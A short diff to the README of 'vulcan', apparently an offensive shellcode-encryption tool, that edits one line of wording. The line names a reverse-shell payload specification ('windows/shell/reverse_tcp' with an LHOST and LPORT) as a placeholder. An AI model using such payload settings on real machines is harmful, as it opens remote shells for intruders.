aress31/vulcan/README.md

     > [!WARNING]
     > The length of the key must be shorted than the shellcode.

-> Although obvious, `windows/shell/reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread` is a placeholder for your own values... 🙄
+> Although obvious, `windows/shell/reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread` is a placeholder for your own values in the above examples... 🙄

 ## Sponsor 💓